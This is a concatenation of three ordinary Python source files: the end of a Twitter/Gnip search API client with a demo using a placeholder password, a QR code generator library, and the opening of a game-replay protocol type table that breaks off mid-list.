self.rec_list_list.append(tmp_list)
t = datetime.datetime.strptime(tmp_list[POSTED_TIME_IDX], TIME_FORMAT_LONG)
tmp_tl_list = [tmp_list[POSTED_TIME_IDX], 1, t]
self.tweet_times_flag = True
# this list is ***either*** list of buckets or list of tweet times!
self.time_series.append(tmp_tl_list)
# timeline requests don't return activities!
if t < self.oldest_t:
self.oldest_t = t
if t > self.newest_t:
self.newest_t = t
self.delta_t = (self.newest_t - self.oldest_t).total_seconds()/60.
return
def get_rate(self):
"""Returns rate from last query executed"""
if self.delta_t != 0:
return float(self.res_cnt)/self.delta_t
else:
return None
def __len__(self):
"""Returns the size of the results set when len(Query) is called."""
try:
return self.res_cnt
except AttributeError:
return 0
def __repr__(self):
"""Returns a string represenataion of the result set."""
try:
return "\n".join([json.dumps(x) for x in self.rec_dict_list])
except AttributeError:
return "No query completed."
if __name__ == "__main__":
g = Query("shendrickson@gnip.com"
, "XXXXXPASSWORDXXXXX"
, "https://gnip-api.twitter.com/search/30day/accounts/shendrickson/wayback.json")
g.execute("bieber", 10)
for x in g.get_activity_set():
print(x)
print(g)
print(g.get_rate())
g.execute("bieber", count_bucket = "hour")
print(g)
print(len(g))
pg = Query("shendrickson@gnip.com"
, "XXXXXPASSWORDXXXXX"
, "https://gnip-api.twitter.com/search/30day/accounts/shendrickson/wayback.json"
, paged = True
, output_file_path = "../data/")
now_date = datetime.datetime.now()
pg.execute("bieber"
, end=now_date.strftime(TIME_FORMAT_LONG)
, start=(now_date - datetime.timedelta(seconds=200)).strftime(TIME_FORMAT_LONG))
for x in pg.get_activity_set():
print(x)
g.execute("bieber", show_query=True)
|
|
#
# QR Code Generator for Python
#
# Copyright (c) 2012 Kazuhiko Arase
#
# URL: http://www.d-project.com/
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# The word 'QR Code' is registered trademark of
# DENSO WAVE INCORPORATED
# http://www.denso-wave.com/qrcode/faqpatent-e.html
#
"""QR Code Generator for Python
from qrcode import QRCode, ErrorCorrectLevel
# generate with explicit type number
qr = QRCode()
qr.setTypeNumber(4)
qr.setErrorCorrectLevel(ErrorCorrectLevel.M)
qr.addData('here comes qr!')
qr.make()
# generate with auto type number
# qr = QRCode.getMinimumQRCode('here comes qr!', ErrorCorrectLevel.M)
# create an image
for r in range(qr.getModuleCount() ):
for c in range(qr.getModuleCount() ):
color = black if qr.isDark(r, c) else white
# set pixel ...
"""
class QRCode:
PAD0 = 0xEC
PAD1 = 0x11
def __init__(self):
self.typeNumber = 1
self.errorCorrectLevel = ErrorCorrectLevel.H
self.qrDataList = []
self.modules = []
self.moduleCount = 0
def getTypeNumber(self):
return self.typeNumber
def setTypeNumber(self, typeNumber):
self.typeNumber = typeNumber
def getErrorCorrectLevel(self):
return self.errorCorrectLevel
def setErrorCorrectLevel(self, errorCorrectLevel):
self.errorCorrectLevel = errorCorrectLevel
def clearData(self):
self.qrDataList = []
def addData(self, data):
self.qrDataList.append(QR8BitByte(data) )
def getDataCount(self):
return len(self.qrDataList)
def getData(self, index):
return self.qrDataList[index]
def isDark(self, row, col):
return (self.modules[row][col] if self.modules[row][col] != None
else False)
def getModuleCount(self):
return self.moduleCount
def make(self):
self._make(False, self._getBestMaskPattern() )
def _getBestMaskPattern(self):
minLostPoint = 0
pattern = 0
for i in range(8):
self._make(True, i)
lostPoint = QRUtil.getLostPoint(self)
if i == 0 or minLostPoint > lostPoint:
minLostPoint = lostPoint
pattern = i
return pattern
def _make(self, test, maskPattern):
self.moduleCount = self.typeNumber * 4 + 17
self.modules = [[None] * self.moduleCount
for i in range(self.moduleCount)]
self._setupPositionProbePattern(0, 0)
self._setupPositionProbePattern(self.moduleCount - 7, 0)
self._setupPositionProbePattern(0, self.moduleCount - 7)
self._setupPositionAdjustPattern()
self._setupTimingPattern()
self._setupTypeInfo(test, maskPattern)
if self.typeNumber >= 7:
self._setupTypeNumber(test)
data = QRCode._createData(
self.typeNumber,
self.errorCorrectLevel,
self.qrDataList)
self._mapData(data, maskPattern)
def _mapData(self, data, maskPattern):
rows = list(range(self.moduleCount) )
cols = [col - 1 if col <= 6 else col
for col in range(self.moduleCount - 1, 0, -2)]
maskFunc = QRUtil.getMaskFunction(maskPattern)
byteIndex = 0
bitIndex = 7
for col in cols:
rows.reverse()
for row in rows:
for c in range(2):
if self.modules[row][col - c] == None:
dark = False
if byteIndex < len(data):
dark = ( (data[byteIndex] >> bitIndex) & 1) == 1
if maskFunc(row, col - c):
dark = not dark
self.modules[row][col - c] = dark
bitIndex -= 1
if bitIndex == -1:
byteIndex += 1
bitIndex = 7
def _setupPositionAdjustPattern(self):
pos = QRUtil.getPatternPosition(self.typeNumber)
for row in pos:
for col in pos:
if self.modules[row][col] != None:
continue
for r in range(-2, 3):
for c in range(-2, 3):
self.modules[row + r][col + c] = (
r == -2 or r == 2 or c == -2 or c == 2
or (r == 0 and c == 0) )
def _setupPositionProbePattern(self, row, col):
for r in range(-1, 8):
for c in range(-1, 8):
if (row + r <= -1 or self.moduleCount <= row + r
or col + c <= -1 or self.moduleCount <= col + c):
continue
self.modules[row + r][col + c] = (
(0 <= r and r <= 6 and (c == 0 or c == 6) )
or (0 <= c and c <= 6 and (r == 0 or r == 6) )
or (2 <= r and r <= 4 and 2 <= c and c <= 4) )
def _setupTimingPattern(self):
for r in range(8, self.moduleCount - 8):
if self.modules[r][6] != None:
continue
self.modules[r][6] = r % 2 == 0
for c in range(8, self.moduleCount - 8):
if self.modules[6][c] != None:
continue
self.modules[6][c] = c % 2 == 0
def _setupTypeNumber(self, test):
bits = QRUtil.getBCHTypeNumber(self.typeNumber)
for i in range(18):
self.modules[i // 3][i % 3 + self.moduleCount - 8 - 3] = (
not test and ( (bits >> i) & 1) == 1)
for i in range(18):
self.modules[i % 3 + self.moduleCount - 8 - 3][i // 3] = (
not test and ( (bits >> i) & 1) == 1)
def _setupTypeInfo(self, test, maskPattern):
data = (self.errorCorrectLevel << 3) | maskPattern
bits = QRUtil.getBCHTypeInfo(data)
# vertical
for i in range(15):
mod = not test and ( (bits >> i) & 1) == 1
if i < 6:
self.modules[i][8] = mod
elif i < 8:
self.modules[i + 1][8] = mod
else:
self.modules[self.moduleCount - 15 + i][8] = mod
# horizontal
for i in range(15):
mod = not test and ( (bits >> i) & 1) == 1
if i < 8:
self.modules[8][self.moduleCount - i - 1] = mod
elif i < 9:
self.modules[8][15 - i - 1 + 1] = mod
else:
self.modules[8][15 - i - 1] = mod
# fixed
self.modules[self.moduleCount - 8][8] = not test
@staticmethod
def _createData(typeNumber, errorCorrectLevel, dataArray):
rsBlocks = RSBlock.getRSBlocks(typeNumber, errorCorrectLevel)
buffer = BitBuffer()
for data in dataArray:
buffer.put(data.getMode(), 4)
buffer.put(data.getLength(), data.getLengthInBits(typeNumber) )
data.write(buffer)
totalDataCount = sum(rsBlock.getDataCount()
for rsBlock in rsBlocks)
if buffer.getLengthInBits() > totalDataCount * 8:
raise Exception('code length overflow. (%s>%s)' %
(buffer.getLengthInBits(), totalDataCount * 8) )
# end code
if buffer.getLengthInBits() + 4 <= totalDataCount * 8:
buffer.put(0, 4)
# padding
while buffer.getLengthInBits() % 8 != 0:
buffer.put(False)
# padding
while True:
if buffer.getLengthInBits() >= totalDataCount * 8:
break
buffer.put(QRCode.PAD0, 8)
if buffer.getLengthInBits() >= totalDataCount * 8:
break
buffer.put(QRCode.PAD1, 8)
return QRCode._createBytes(buffer, rsBlocks)
@staticmethod
def _createBytes(buffer, rsBlocks):
offset = 0
maxDcCount = 0
maxEcCount = 0
dcdata = [None] * len(rsBlocks)
ecdata = [None] * len(rsBlocks)
for r in range(len(rsBlocks) ):
dcCount = rsBlocks[r].getDataCount()
ecCount = rsBlocks[r].getTotalCount() - dcCount
maxDcCount = max(maxDcCount, dcCount)
maxEcCount = max(maxEcCount, ecCount)
dcdata[r] = [0] * dcCount
for i in range(len(dcdata[r] ) ):
dcdata[r][i] = 0xff & buffer.getBuffer()[i + offset]
offset += dcCount
rsPoly = QRUtil.getErrorCorrectPolynomial(ecCount)
rawPoly = Polynomial(dcdata[r], rsPoly.getLength() - 1)
modPoly = rawPoly.mod(rsPoly)
ecdata[r] = [0] * (rsPoly.getLength() - 1)
for i in range(len(ecdata[r]) ):
modIndex = i + modPoly.getLength() - len(ecdata[r])
ecdata[r][i] = modPoly.get(modIndex) if modIndex >= 0 else 0
totalCodeCount = sum(rsBlock.getTotalCount()
for rsBlock in rsBlocks)
data = [0] * totalCodeCount
index = 0
for i in range(maxDcCount):
for r in range(len(rsBlocks) ):
if i < len(dcdata[r] ):
data[index] = dcdata[r][i]
index += 1
for i in range(maxEcCount):
for r in range(len(rsBlocks) ):
if i < len(ecdata[r] ):
data[index] = ecdata[r][i]
index += 1
return data
@staticmethod
def getMinimumQRCode(data, errorCorrectLevel):
mode = Mode.MODE_8BIT_BYTE # fixed to 8bit byte
qr = QRCode()
qr.setErrorCorrectLevel(errorCorrectLevel)
qr.addData(data)
length = qr.getData(0).getLength()
for typeNumber in range(1, 11):
if length <= QRUtil.getMaxLength(
typeNumber, mode, errorCorrectLevel):
qr.setTypeNumber(typeNumber)
break
qr.make()
return qr
class Mode:
MODE_NUMBER = 1 << 0
MODE_ALPHA_NUM = 1 << 1
MODE_8BIT_BYTE = 1 << 2
MODE_KANJI = 1 << 3
class ErrorCorrectLevel:
L = 1 # 7%
M = 0 # 15%
Q = 3 # 25%
H = 2 # 30%
class MaskPattern:
PATTERN000 = 0
PATTERN001 = 1
PATTERN010 = 2
PATTERN011 = 3
PATTERN100 = 4
PATTERN101 = 5
PATTERN110 = 6
PATTERN111 = 7
class QRUtil:
@staticmethod
def getPatternPosition(typeNumber):
return QRUtil.PATTERN_POSITION_TABLE[typeNumber - 1]
PATTERN_POSITION_TABLE = [
[],
[6, 18],
[6, 22],
[6, 26],
[6, 30],
[6, 34],
[6, 22, 38],
[6, 24, 42],
[6, 26, 46],
[6, 28, 50],
[6, 30, 54],
[6, 32, 58],
[6, 34, 62],
[6, 26, 46, 66],
[6, 26, 48, 70],
[6, 26, 50, 74],
[6, 30, 54, 78],
[6, 30, 56, 82],
[6, 30, 58, 86],
[6, 34, 62, 90],
[6, 28, 50, 72, 94],
[6, 26, 50, 74, 98],
[6, 30, 54, 78, 102],
[6, 28, 54, 80, 106],
[6, 32, 58, 84, 110],
[6, 30, 58, 86, 114],
[6, 34, 62, 90, 118],
[6, 26, 50, 74, 98, 122],
[6, 30, 54, 78, 102, 126],
[6, 26, 52, 78, 104, 130],
[6, 30, 56, 82, 108, 134],
[6, 34, 60, 86, 112, 138],
[6, 30, 58, 86, 114, 142],
[6, 34, 62, 90, 118, 146],
[6, 30, 54, 78, 102, 126, 150],
[6, 24, 50, 76, 102, 128, 154],
[6, 28, 54, 80, 106, 132, 158],
[6, 32, 58, 84, 110, 136, 162],
[6, 26, 54, 82, 110, 138, 166],
[6, 30, 58, 86, 114, 142, 170]
]
MAX_LENGTH = [
[ [41, 25, 17, 10], [34, 20, 14, 8], [27, 16, 11, 7], [17, 10, 7, 4] ],
[ [77, 47, 32, 20], [63, 38, 26, 16], [48, 29, 20, 12], [34, 20, 14, 8] ],
[ [127, 77, 53, 32], [101, 61, 42, 26], [77, 47, 32, 20], [58, 35, 24, 15] ],
[ [187, 114, 78, 48], [149, 90, 62, 38], [111, 67, 46, 28], [82, 50, 34, 21] ],
[ [255, 154, 106, 65], [202, 122, 84, 52], [144, 87, 60, 37], [106, 64, 44, 27] ],
[ [322, 195, 134, 82], [255, 154, 106, 65], [178, 108, 74, 45], [139, 84, 58, 36] ],
[ [370, 224, 154, 95], [293, 178, 122, 75], [207, 125, 86, 53], [154, 93, 64, 39] ],
[ [461, 279, 192, 118], [365, 221, 152, 93], [259, 157, 108, 66], [202, 122, 84, 52] ],
[ [552, 335, 230, 141], [432, 262, 180, 111], [312, 189, 130, 80], [235, 143, 98, 60] ],
[ [652, 395, 271, 167], [513, 311, 213, 131], [364, 221, 151, 93], [288, 174, 119, 74] ]
]
@staticmethod
def getMaxLength(typeNumber, mode, errorCorrectLevel):
t = typeNumber - 1
e = {
ErrorCorrectLevel.L: 0,
ErrorCorrectLevel.M: 1,
ErrorCorrectLevel.Q: 2,
ErrorCorrectLevel.H: 3
}[errorCorrectLevel]
m = {
Mode.MODE_NUMBER: 0,
Mode.MODE_ALPHA_NUM: 1,
Mode.MODE_8BIT_BYTE: 2,
Mode.MODE_KANJI: 3
}[mode]
return QRUtil.MAX_LENGTH[t][e][m]
@staticmethod
def getErrorCorrectPolynomial(errorCorrectLength):
a = Polynomial([1])
for i in range(errorCorrectLength):
a = a.multiply(Polynomial([1, QRMath.gexp(i)]) )
return a
@staticmethod
def getMaskFunction(maskPattern):
return {
MaskPattern.PATTERN000:
lambda i, j: (i + j) % 2 == 0,
MaskPattern.PATTERN001:
lambda i, j: i % 2 == 0,
MaskPattern.PATTERN010:
lambda i, j: j % 3 == 0,
MaskPattern.PATTERN011:
lambda i, j: (i + j) % 3 == 0,
MaskPattern.PATTERN100:
lambda i, j: (i // 2 + j // 3) % 2 == 0,
MaskPattern.PATTERN101:
lambda i, j: (i * j) % 2 + (i * j) % 3 == 0,
MaskPattern.PATTERN110:
lambda i, j: ( (i * j) % 2 + (i * j) % 3) % 2 == 0,
MaskPattern.PATTERN111:
lambda i, j: ( (i * j) % 3 + (i + j) % 2) % 2 == 0
}[maskPattern]
@staticmethod
def getLostPoint(qrcode):
moduleCount = qrcode.getModuleCount()
lostPoint = 0
# LEVEL1
for row in range(moduleCount):
for col in range(moduleCount):
sameCount = 0
dark = qrcode.isDark(row, col)
for r in range(-1, 2):
if row + r < 0 or moduleCount <= row + r:
continue
for c in range(-1, 2):
if col + c < 0 or moduleCount <= col + c:
continue
if r == 0 and c == 0:
continue
if dark == qrcode.isDark(row + r, col + c):
sameCount += 1
if sameCount > 5:
lostPoint += (3 + sameCount - 5)
# LEVEL2
for row in range(moduleCount - 1):
for col in range(moduleCount - 1):
count = 0
if qrcode.isDark(row, col):
count += 1
if qrcode.isDark(row + 1, col):
count += 1
if qrcode.isDark(row, col + 1):
count += 1
if qrcode.isDark(row + 1, col + 1):
count += 1
if count == 0 or count == 4:
lostPoint += 3
# LEVEL3
for row in range(moduleCount):
for col in range(moduleCount - 6):
if (qrcode.isDark(row, col)
and not qrcode.isDark(row, col + 1)
and qrcode.isDark(row, col + 2)
and qrcode.isDark(row, col + 3)
and qrcode.isDark(row, col + 4)
and not qrcode.isDark(row, col + 5)
and qrcode.isDark(row, col + 6) ):
lostPoint += 40
for col in range(moduleCount):
for row in range(moduleCount - 6):
if (qrcode.isDark(row, col)
and not qrcode.isDark(row + 1, col)
and qrcode.isDark(row + 2, col)
and qrcode.isDark(row + 3, col)
and qrcode.isDark(row + 4, col)
and not qrcode.isDark(row + 5, col)
and qrcode.isDark(row + 6, col) ):
lostPoint += 40
# LEVEL4
darkCount = 0
for col in range(moduleCount):
for row in range(moduleCount):
if qrcode.isDark(row, col):
darkCount += 1
ratio = abs(100 * darkCount // moduleCount // moduleCount - 50) // 5
lostPoint += ratio * 10
return lostPoint
G15 = ( (1 << 10) | (1 << 8) | (1 << 5) | (1 << 4) |
(1 << 2) | (1 << 1) | (1 << 0) )
G18 = ( (1 << 12) | (1 << 11) | (1 << 10) | (1 << 9) |
(1 << 8) | (1 << 5) | (1 << 2) | (1 << 0) )
G15_MASK = (1 << 14) | (1 << 12) | (1 << 10) | (1 << 4) | (1 << 1)
@staticmethod
def getBCHTypeInfo(data):
d = data << 10
while QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) >= 0:
d ^= (QRUtil.G15 << (QRUtil.getBCHDigit(d) -
QRUtil.getBCHDigit(QRUtil.G15) ) )
return ( (data << 10) | d) ^ QRUtil.G15_MASK
@staticmethod
def getBCHTypeNumber(data):
d = data << 12
while QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) >= 0:
d ^= (QRUtil.G18 << (QRUtil.getBCHDigit(d) -
QRUtil.getBCHDigit(QRUtil.G18) ) )
return (data << 12) | d
@staticmethod
def getBCHDigit(data):
digit = 0
while data != 0:
digit += 1
data >>= 1
return digit
@staticmethod
def stringToBytes(s):
return [ord(c) & 0xff for c in s]
class QR8BitByte:
def __init__(self, data):
self.mode = Mode.MODE_8BIT_BYTE
self.data = data
def getMode(self):
return self.mode
def getData(self):
return self.data
'''
def write(self, buffer): raise Exception('not implemented.')
def getLength(self): raise Exception('not implemented.')
'''
def write(self, buffer):
data = QRUtil.stringToBytes(self.getData() )
for d in data:
buffer.put(d, 8)
def getLength(self):
return len(QRUtil.stringToBytes(self.getData() ) )
def getLengthInBits(self, type):
if 1 <= type and type < 10: # 1 - 9
return {
Mode.MODE_NUMBER: 10,
Mode.MODE_ALPHA_NUM: 9,
Mode.MODE_8BIT_BYTE: 8,
Mode.MODE_KANJI: 8
}[self.mode]
elif type < 27: # 10 - 26
return {
Mode.MODE_NUMBER: 12,
Mode.MODE_ALPHA_NUM: 11,
Mode.MODE_8BIT_BYTE: 16,
Mode.MODE_KANJI: 10
}[self.mode]
elif type < 41: # 27 - 40
return {
Mode.MODE_NUMBER: 14,
Mode.MODE_ALPHA_NUM: 13,
Mode.MODE_8BIT_BYTE: 16,
Mode.MODE_KANJI: 12
}[self.mode]
else:
raise Exception('type:%s' % type)
class QRMath:
EXP_TABLE = None
LOG_TABLE = None
@staticmethod
def _init():
QRMath.EXP_TABLE = [0] * 256
for i in range(256):
QRMath.EXP_TABLE[i] = (1 << i if i < 8 else
QRMath.EXP_TABLE[i - 4] ^ QRMath.EXP_TABLE[i - 5] ^
QRMath.EXP_TABLE[i - 6] ^ QRMath.EXP_TABLE[i - 8])
QRMath.LOG_TABLE = [0] * 256
for i in range(255):
QRMath.LOG_TABLE[QRMath.EXP_TABLE[i] ] = i
@staticmethod
def glog(n):
if n < 1:
raise Exception('log(%s)' % n)
return QRMath.LOG_TABLE[n]
@staticmethod
def gexp(n):
while n < 0:
n += 255
while n >= 256:
n -= 255
return QRMath.EXP_TABLE[n]
# initialize statics
QRMath._init()
class Polynomial:
def __init__(self, num, shift=0):
offset = 0
length = len(num)
while offset < length and num[offset] == 0:
offset += 1
self.num = num[offset:] + [0] * shift
def get(self, index):
return self.num[index]
def getLength(self):
return len(self.num)
def __repr__(self):
return ','.join( [str(self.get(i) )
for i in range(self.getLength() ) ] )
def toLogString(self):
return ','.join( [str(QRMath.glog(self.get(i) ) )
for i in range(self.getLength() ) ] )
def multiply(self, e):
num = [0] * (self.getLength() + e.getLength() - 1)
for i in range(self.getLength() ):
for j in range(e.getLength() ):
num[i + j] ^= QRMath.gexp(QRMath.glog(self.get(i) ) +
QRMath.glog(e.get(j) ) )
return Polynomial(num)
def mod(self, e):
if self.getLength() - e.getLength() < 0:
return self
ratio = QRMath.glog(self.get(0) ) - QRMath.glog(e.get(0) )
num = self.num[:]
for i in range(e.getLength() ):
num[i] ^= QRMath.gexp(QRMath.glog(e.get(i) ) + ratio)
return Polynomial(num).mod(e)
class RSBlock:
RS_BLOCK_TABLE = [
# L
# M
# Q
# H
# 1
[1, 26, 19],
[1, 26, 16],
[1, 26, 13],
[1, 26, 9],
# 2
[1, 44, 34],
[1, 44, 28],
[1, 44, 22],
[1, 44, 16],
# 3
[1, 70, 55],
[1, 70, 44],
[2, 35, 17],
[2, 35, 13],
# 4
[1, 100, 80],
[2, 50, 32],
[2, 50, 24],
[4, 25, 9],
# 5
[1, 134, 108],
[2, 67, 43],
[2, 33, 15, 2, 34, 16],
[2, 33, 11, 2, 34, 12],
# 6
[2, 86, 68],
[4, 43, 27],
[4, 43, 19],
[4, 43, 15],
# 7
[2, 98, 78],
[4, 49, 31],
[2, 32, 14, 4, 33, 15],
[4, 39, 13, 1, 40, 14],
# 8
[2, 121, 97],
[2, 60, 38, 2, 61, 39],
[4, 40, 18, 2, 41, 19],
[4, 40, 14, 2, 41, 15],
# 9
[2, 146, 116],
[3, 58, 36, 2, 59, 37],
[4, 36, 16, 4, 37, 17],
[4, 36, 12, 4, 37, 13],
# 10
[2, 86, 68, 2, 87, 69],
[4, 69, 43, 1, 70, 44],
[6, 43, 19, 2, 44, 20],
[6, 43, 15, 2, 44, 16]
]
def __init__(self, totalCount, dataCount):
self.totalCount = totalCount
self.dataCount = dataCount
def getDataCount(self):
return self.dataCount
def getTotalCount(self):
return self.totalCount
def __repr__(self):
return ('(total=%s,data=%s)' % (self.totalCount, self.dataCount) )
@staticmethod
def getRSBlocks(typeNumber, errorCorrectLevel):
rsBlock = RSBlock.getRsBlockTable(typeNumber, errorCorrectLevel)
length = len(rsBlock) // 3
list = []
for i in range(length):
count = rsBlock[i * 3 + 0]
totalCount = rsBlock[i * 3 + 1]
dataCount = rsBlock[i * 3 + 2]
list += [RSBlock(totalCount, dataCount)] * count
return list
@staticmethod
def getRsBlockTable(typeNumber, errorCorrectLevel):
return {
ErrorCorrectLevel.L:
RSBlock.RS_BLOCK_TABLE[ (typeNumber - 1) * 4 + 0],
ErrorCorrectLevel.M:
RSBlock.RS_BLOCK_TABLE[ (typeNumber - 1) * 4 + 1],
ErrorCorrectLevel.Q:
RSBlock.RS_BLOCK_TABLE[ (typeNumber - 1) * 4 + 2],
ErrorCorrectLevel.H:
RSBlock.RS_BLOCK_TABLE[ (typeNumber - 1) * 4 + 3]
}[errorCorrectLevel]
class BitBuffer:
def __init__(self, inclements=32):
self.inclements = inclements
self.buffer = [0] * self.inclements
self.length = 0
def getBuffer(self):
return self.buffer
def getLengthInBits(self):
return self.length
def get(self, index):
return ( (self.buffer[index // 8] >> (7 - index % 8) ) & 1) == 1
def putBit(self, bit):
if self.length == len(self.buffer) * 8:
self.buffer += [0] * self.inclements
if bit:
self.buffer[self.length // 8] |= (0x80 >> (self.length % 8) )
self.length += 1
def put(self, num, length):
for i in range(length):
self.putBit( ( (num >> (length - i - 1) ) & 1) == 1)
def __repr__(self):
return ''.join('1' if self.get(i) else '0'
for i in range(self.getLengthInBits() ) )
|
|
# Copyright (c) 2015 Blizzard Entertainment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from heroprotocol.decoders import *
# Decoding instructions for each protocol type.
typeinfos = [
('_int',[(0,7)]), #0
('_int',[(0,4)]), #1
('_int',[(0,5)]), #2
('_int',[(0,6)]), #3
('_int',[(0,14)]), #4
('_int',[(0,22)]), #5
('_int',[(0,32)]), #6
('_choice',[(0,2),{0:('m_uint6',3),1:('m_uint14',4),2:('m_uint22',5),3:('m_uint32',6)}]), #7
('_struct',[[('m_userId',2,-1)]]), #8
('_blob',[(0,8)]), #9
('_int',[(0,8)]), #10
('_struct',[[('m_flags',10,0),('m_major',10,1),('m_minor',10,2),('m_revision',10,3),('m_build',6,4),('m_baseBuild',6,5)]]), #11
('_int',[(0,3)]), #12
('_bool',[]), #13
('_array',[(16,0),10]), #14
('_optional',[14]), #15
('_blob',[(16,0)]), #16
('_struct',[[('m_dataDeprecated',15,0),('m_data',16,1)]]), #17
('_struct',[[('m_signature',9,0),('m_version',11,1),('m_type',12,2),('m_elapsedGameLoops',6,3),('m_useScaledTime',13,4),('m_ngdpRootKey',17,5),('m_dataBuildNum',6,6),('m_fixedFileHash',17,7)]]), #18
('_fourcc',[]), #19
('_blob',[(0,7)]), #20
('_int',[(0,64)]), #21
('_struct',[[('m_region',10,0),('m_programId',19,1),('m_realm',6,2),('m_name',20,3),('m_id',21,4)]]), #22
('_struct',[[('m_a',10,0),('m_r',10,1),('m_g',10,2),('m_b',10,3)]]), #23
('_int',[(0,2)]), #24
('_optional',[10]), #25
('_struct',[[('m_name',9,0),('m_toon',22,1),('m_race',9,2),('m_color',23,3),('m_control',10,4),('m_teamId',1,5),('m_handicap',0,6),('m_observe',24,7),('m_result',24,8),('m_workingSetSlotId',25,9),('m_hero',9,10)]]), #26
('_array',[(0,5),26]), #27
('_optional',[27]), #28
('_blob',[(0,10)]), #29
('_blob',[(0,11)]), #30
('_struct',[[('m_file',30,0)]]), #31
('_optional',[13]), #32
('_int',[(-9223372036854775808,64)]), #33
('_blob',[(0,12)]), #34
('_blob',[(40,0)]), #35
('_array',[(0,6),35]), #36
('_optional',[36]), #37
('_array',[(0,6),30]), #38
('_optional',[38]), #39
('_struct',[[('m_playerList',28,0),('m_title',29,1),('m_difficulty',9,2),('m_thumbnail',31,3),('m_isBlizzardMap',13,4),('m_restartAsTransitionMap',32,16),('m_timeUTC',33,5),('m_timeLocalOffset',33,6),('m_description',34,7),('m_imageFilePath',30,8),('m_campaignIndex',10,15),('m_mapFileName',30,9),('m_cacheHandles',37,10),('m_miniSave',13,11),('m_gameSpeed',12,12),('m_defaultDifficulty',3,13),('m_modPaths',39,14)]]), #40
('_optional',[9]), #41
('_optional',[35]), #42
('_optional',[6]), #43
('_struct',[[('m_race',25,-1)]]), #44
('_struct',[[('m_team',25,-1)]]), #45
('_blob',[(0,9)]), #46
('_struct',[[('m_name',9,-18),('m_clanTag',41,-17),('m_clanLogo',42,-16),('m_highestLeague',25,-15),('m_combinedRaceLevels',43,-14),('m_randomSeed',6,-13),('m_racePreference',44,-12),('m_teamPreference',45,-11),('m_testMap',13,-10),('m_testAuto',13,-9),('m_examine',13,-8),('m_customInterface',13,-7),('m_testType',6,-6),('m_observe',24,-5),('m_hero',46,-4),('m_skin',46,-3),('m_mount',46,-2),('m_toonHandle',20,-1)]]), #47
('_array',[(0,5),47]), #48
('_struct',[[('m_lockTeams',13,-16),('m_teamsTogether',13,-15),('m_advancedSharedControl',13,-14),('m_randomRaces',13,-13),('m_battleNet',13,-12),('m_amm',13,-11),('m_competitive',13,-10),('m_practice',13,-9),('m_cooperative',13,-8),('m_noVictoryOrDefeat',13,-7),('m_heroDuplicatesAllowed',13,-6),('m_fog',24,-5),('m_observers',24,-4),('m_userDifficulty',24,-3),('m_clientDebugFlags',21,-2),('m_ammId',43,-1)]]), #49
('_int',[(1,4)]), #50
('_int',[(1,8)]), #51
('_bitarray',[(0,6)]), #52
('_bitarray',[(0,8)]), #53
('_bitarray',[(0,2)]), #54
('_bitarray',[(0,7)]), #55
('_struct',[[('m_allowedColors',52,-6),('m_allowedRaces',53,-5),('m_allowedDifficulty',52,-4),('m_allowedControls',53,-3),('m_allowedObserveTypes',54,-2),('m_allowedAIBuilds',55,-1)]]), #56
('_array',[(0,5),56]), #57
('_struct',[[('m_randomValue',6,-26),('m_gameCacheName',29,-25),('m_gameOptions',49,-24),('m_gameSpeed',12,-23),('m_gameType',12,-22),('m_maxUsers',2,-21),('m_maxObservers',2,-20),('m_maxPlayers',2,-19),('m_maxTeams',50,-18),('m_maxColors',3,-17),('m_maxRaces',51,-16),('m_maxControls',10,-15),('m_mapSizeX',10,-14),('m_mapSizeY',10,-13),('m_mapFileSyncChecksum',6,-12),('m_mapFileName',30,-11),('m_mapAuthorName',9,-10),('m_modFileSyncChecksum',6,-9),('m_slotDescriptions',57,-8),('m_defaultDifficulty',3,-7),('m_defaultAIBuild',0,-6),('m_cacheHandles',36,-5),('m_hasExtensionMod',13,-4),('m_isBlizzardMap',13,-3),('m_isPremadeFFA',13,-2),('m_isCoopMode',13,-1)]]), #58
('_optional',[1]), #59
('_optional',[2]), #60
('_struct',[[('m_color',60,-1)]]), #61
('_array',[(0,4),46]), #62
('_array',[(0,17),6]), #63
('_array',[(0,9),6]), #64
('_struct',[[('m_control',10,-20),('m_userId',59,-19),('m_teamId',1,-18),('m_colorPref',61,-17),('m_racePref',44,-16),('m_difficulty',3,-15),('m_aiBuild',0,-14),('m_handicap',0,-13),('m_observe',24,-12),('m_logoIndex',6,-11),('m_hero',46,-10),('m_skin',46,-9),('m_mount',46,-8),('m_artifacts',62,-7),('m_workingSetSlotId',25,-6),('m_rewards',63,-5),('m_toonHandle',20,-4),('m_licenses',64,-3),('m_tandemLeaderUserId',59,-2),('m_hasSilencePenalty',13,-1)]]), #65
('_array',[(0,5),65]), #66
('_struct',[[('m_phase',12,-11),('m_maxUsers',2,-10),('m_maxObservers',2,-9),('m_slots',66,-8),('m_randomSeed',6,-7),('m_hostUserId',59,-6),('m_isSinglePlayer',13,-5),('m_pickedMapTag',10,-4),('m_gameDuration',6,-3),('m_defaultDifficulty',3,-2),('m_defaultAIBuild',0,-1)]]), #67
('_struct',[[('m_userInitialData',48,-3),('m_gameDescription',58,-2),('m_lobbyState',67,-1)]]), #68
('_struct',[[('m_syncLobbyState',68,-1)]]), #69
('_struct',[[('m_name',20,-1)]]), #70
('_blob',[(0,6)]), #71
('_struct',[[('m_name',71,-1)]]), #72
('_struct',[[('m_name',71,-3),('m_type',6,-2),('m_data',20,-1)]]), #73
('_struct',[[('m_type',6,-3),('m_name',71,-2),('m_data',34,-1)]]), #74
